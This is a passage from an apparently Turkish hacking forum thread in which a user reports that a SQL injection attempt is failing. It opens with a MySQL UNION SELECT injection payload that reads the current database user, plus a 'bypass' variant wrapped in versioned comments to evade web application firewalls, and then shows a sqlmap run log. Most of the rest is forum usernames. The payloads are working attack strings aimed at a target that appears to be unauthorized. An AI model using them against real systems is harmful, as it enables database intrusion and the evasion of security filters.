* Orijinal Komut: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* Bypass Komutu: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
Platform:
* MySQL >= 5.1.13

Kaliyeyenibaşladım · 9 Nis 2022

Merak edenler için hala devam ediyor

all tested parameters do not appear to be injectable. As heuristic test turned out positive you are strongly advised to continue on with the tests
[20:30:47] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 3598 times
Bir şey diyecem ban yiyecem.

Sızma Testleri SQL Injection ile sızma başarasız oluyor

Kaliyeyenibaşladım

Katılımcı Üye

w1sd0m

Katılımcı Üye

Kaliyeyenibaşladım

Katılımcı Üye

OBT is HeRYerDe

Kıdemli Üye

Kaliyeyenibaşladım

Katılımcı Üye

deltaturk

Katılımcı Üye

Kaliyeyenibaşladım

Katılımcı Üye

deltaturk

Katılımcı Üye

deltaturk

Katılımcı Üye

deltaturk

Katılımcı Üye

Kaliyeyenibaşladım

Katılımcı Üye

Sosyal medya sayfalarımız